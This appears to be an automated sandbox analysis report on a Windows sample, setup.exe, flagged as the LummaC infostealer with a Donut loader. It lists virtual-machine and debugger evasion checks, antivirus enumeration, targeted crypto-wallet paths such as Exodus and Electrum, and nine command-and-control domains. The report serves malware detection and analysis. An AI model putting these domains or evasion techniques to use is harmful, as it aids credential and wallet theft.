              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105A0030_2_0105A003
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102A0420_2_0102A042
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010500710_2_01050071
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010243420_2_01024342
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010363720_2_01036372
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105E3920_2_0105E392
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010562920_2_01056292
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010522A20_2_010522A2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010422B20_2_010422B2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010585720_2_01058572
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010305C20_2_010305C2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102C4E20_2_0102C4E2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103E7120_2_0103E712
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010247220_2_01024722
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010387310_2_01038731
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010647620_2_01064762
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102E7B90_2_0102E7B9
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010546D00_2_010546D0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0104C9030_2_0104C903
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010649E20_2_010649E2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102A8420_2_0102A842
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102AB020_2_0102AB02
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01056BC50_2_01056BC5
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105CA420_2_0105CA42
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103EA520_2_0103EA52
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103AD670_2_0103AD67
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01028DB20_2_01028DB2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01064DE20_2_01064DE2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0104CC370_2_0104CC37
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01050C960_2_01050C96
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105CCA20_2_0105CCA2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01040F820_2_01040F82
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102AF920_2_0102AF92
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103EE620_2_0103EE62
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010251220_2_01025122
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102F1640_2_0102F164
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010610220_2_01061022
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010650E20_2_010650E2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103F3020_2_0103F302
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105D3720_2_0105D372
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010513AD0_2_010513AD
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010653B20_2_010653B2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010332960_2_01033296
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010272F20_2_010272F2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010515340_2_01051534
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103F5620_2_0103F562
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010575A50_2_010575A5
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105D5C20_2_0105D5C2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0104541B0_2_0104541B
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103D9F00_2_0103D9F0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010438B20_2_010438B2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01027B520_2_01027B52
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01047B880_2_01047B88
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01047A3B0_2_01047A3B
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01053A950_2_01053A95
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01025AD20_2_01025AD2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01059AE60_2_01059AE6
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102DAF80_2_0102DAF8
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01057D4A0_2_01057D4A
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01043DA20_2_01043DA2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01033DD20_2_01033DD2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01049F720_2_01049F72
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01027FE20_2_01027FE2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0300C3060_2_0300C306
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030287800_2_03028780
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030125E00_2_030125E0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030088500_2_03008850
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0302E87F0_2_0302E87F
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030431F00_2_030431F0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030410920_2_03041092
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030097A00_2_030097A0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0303BB800_2_0303BB80
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_03043BC00_2_03043BC0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0300D9720_2_0300D972
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0303BDD00_2_0303BDD0
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C1C288 appears 48 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 01036362 appears 113 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C475DC appears 163 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C4E010 appears 55 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 01029852 appears 75 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C150E8 appears 43 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C4C7F0 appears 39 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C476C0 appears 66 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C4760F appears 89 times
              Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00C1EBE3 appears 36 times
              Source: setup.exeStatic PE information: invalid certificate
              Source: setup.exeBinary or memory string: OriginalFileName vs setup.exe
              Source: setup.exe, 00000000.00000000.1683707324.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMultiUpdate.exeX vs setup.exe
              Source: setup.exe, 00000000.00000003.1875392084.00000000031E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exe, 00000000.00000003.1875392084.00000000031E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMultiUpdate.exeX vs setup.exe
              Source: setup.exe, 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exe, 00000000.00000000.1683674227.0000000000C96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exeBinary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exeBinary or memory string: OriginalFilenameMultiUpdate.exeX vs setup.exe
              Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C277AA __EH_prolog3_GS,GetCurrentProcess,OpenProcessToken,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryW,GetProcAddress,FreeLibrary,FreeLibrary,GetLastError,0_2_00C277AA
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01020A85 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,0_2_01020A85
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C209D3 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C209D3
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C380C4 FindResourceW,LoadResource,LockResource,0_2_00C380C4
              Source: C:\Users\user\Desktop\setup.exeMutant created: NULL
              Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: setup.exe, 00000000.00000003.1901013030.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914260349.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: setup.exeReversingLabs: Detection: 13%
              Source: setup.exeVirustotal: Detection: 10%
              Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dbgcore.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: setup.exeStatic file information: File size 74715544 > 1048576
              Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Projects\MultiCommander\BuildOutput\Output\Win32\Release v143\MultiUpdate\MultiUpdate.pdb source: setup.exe
              Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C24DE6 __EH_prolog3,GetObjectW,GetObjectW,GetObjectW,LoadLibraryW,GetProcAddress,0_2_00C24DE6
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323D0 push ds; ret 0_2_00C323D9
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323DB push ds; ret 0_2_00C323DD
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323DF push ds; ret 0_2_00C323E1
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323E3 push ds; ret 0_2_00C323E5
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323E7 push ds; ret 0_2_00C323E9
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323EB push ds; ret 0_2_00C323ED
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323EF push ds; ret 0_2_00C323F1
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323F3 push ds; ret 0_2_00C323F5
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323F7 push ds; ret 0_2_00C323F9
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323FB push ds; ret 0_2_00C323FD
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C323FF push ds; ret 0_2_00C32401
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C32393 push ds; ret 0_2_00C32395
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C32353 push ds; ret 0_2_00C3235D
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C32367 push ds; ret 0_2_00C32369
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C32448 push ds; ret 0_2_00C32449
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C3244C push ds; ret 0_2_00C3244D
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C32453 push ds; ret 0_2_00C32455
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C32403 push ds; ret 0_2_00C32405
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C475AA push ecx; ret 0_2_00C475BD
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01063BA2 push eax; mov dword ptr [esp], 565150A3h0_2_01063BA6
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C1C1D3 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00C1C1D3
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C32917 IsIconic,0_2_00C32917
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C01314 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C01314
              Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\setup.exeAPI coverage: 3.1 %
              Source: C:\Users\user\Desktop\setup.exe TID: 7660Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C8805D FindFirstFileExW,0_2_00C8805D
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C2C2ED GetFileAttributesW,FindFirstFileExW,GetLastError,FindFirstFileExW,FindFirstFileExW,GetLastError,FindClose,GetFileAttributesW,GetLastError,FindFirstFileExW,FindNextFileW,0_2_00C2C2ED
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C3C97F SetLastError,FindFirstFileW,GetLastError,0_2_00C3C97F
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C3CAC7 GetModuleHandleW,GetProcAddress,FindFirstFileW,0_2_00C3CAC7
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C40F9D __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_00C40F9D
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C1F238 lstrcpyW,GetSystemInfo,VirtualQuery,0_2_00C1F238
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141673952.000000000122D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2593341348.000000000122B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141521913.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2592829563.000000000121F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_03040BE0 LdrInitializeThunk,0_2_03040BE0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C480CA IsDebuggerPresent,OutputDebugStringW,0_2_00C480CA
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C2CC10 OutputDebugStringA,GetLastError,0_2_00C2CC10
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C24DE6 __EH_prolog3,GetObjectW,GetObjectW,GetObjectW,LoadLibraryW,GetProcAddress,0_2_00C24DE6
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01020375 mov edx, dword ptr fs:[00000030h]0_2_01020375
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01020935 mov eax, dword ptr fs:[00000030h]0_2_01020935
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01020CE5 mov eax, dword ptr fs:[00000030h]0_2_01020CE5
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01020F84 mov eax, dword ptr fs:[00000030h]0_2_01020F84
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01020F85 mov eax, dword ptr fs:[00000030h]0_2_01020F85
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C87E72 GetProcessHeap,0_2_00C87E72
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C71173 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C71173
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C47295 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C47295
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C47B31 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C47B31
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C47CBD SetUnhandledExceptionFilter,0_2_00C47CBD
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C19C19 __EH_prolog3_GS,#17,GetCurrentDirectoryW,ReleaseMutex,CloseHandle,GetModuleFileNameW,ReleaseMutex,CloseHandle,CreateMutexW,GetLastError,ReleaseMutex,Sleep,GetFileAttributesW,SetUnhandledExceptionFilter,GetDesktopWindow,0_2_00C19C19

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: setup.exeString found in binary or memory: cloudewahsj.shop
              Source: setup.exeString found in binary or memory: noisycuttej.shop
              Source: setup.exeString found in binary or memory: tirepublicerj.shop
              Source: setup.exeString found in binary or memory: rabidcowse.shop
              Source: setup.exeString found in binary or memory: abruptyopsn.shop
              Source: setup.exeString found in binary or memory: nearycrepso.shop
              Source: setup.exeString found in binary or memory: framekgirus.shop
              Source: setup.exeString found in binary or memory: wholersorie.shop
              Source: setup.exeString found in binary or memory: regularlavhis.click
              Source: C:\Users\user\Desktop\setup.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW,0_2_00C4077C
              Source: C:\Users\user\Desktop\setup.exeCode function: __EH_prolog3,LoadIconW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00C1ACBD
              Source: C:\Users\user\Desktop\setup.exeCode function: lstrcpyW,GetSystemTimeAsFileTime,GetModuleFileNameW,lstrcpyW,lstrcpyW,GetUserNameW,lstrcpyW,GetSystemInfo,GetUserDefaultUILanguage,GetLocaleInfoW,lstrcpyW,GlobalMemoryStatus,0_2_00C1F31B
              Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C789DE GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00C789DE
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C1F31B lstrcpyW,GetSystemTimeAsFileTime,GetModuleFileNameW,lstrcpyW,lstrcpyW,GetUserNameW,lstrcpyW,GetSystemInfo,GetUserDefaultUILanguage,GetLocaleInfoW,lstrcpyW,GlobalMemoryStatus,0_2_00C1F31B
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C87910 GetTimeZoneInformation,0_2_00C87910
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C38F65 __EH_prolog3_GS,GetCurrentThread,GetCurrentThreadId,GetVersionExW,0_2_00C38F65
              Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: setup.exe, 00000000.00000003.1962331921.0000000003BDE000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn.2
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: setup.exe, 00000000.00000003.1942277987.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
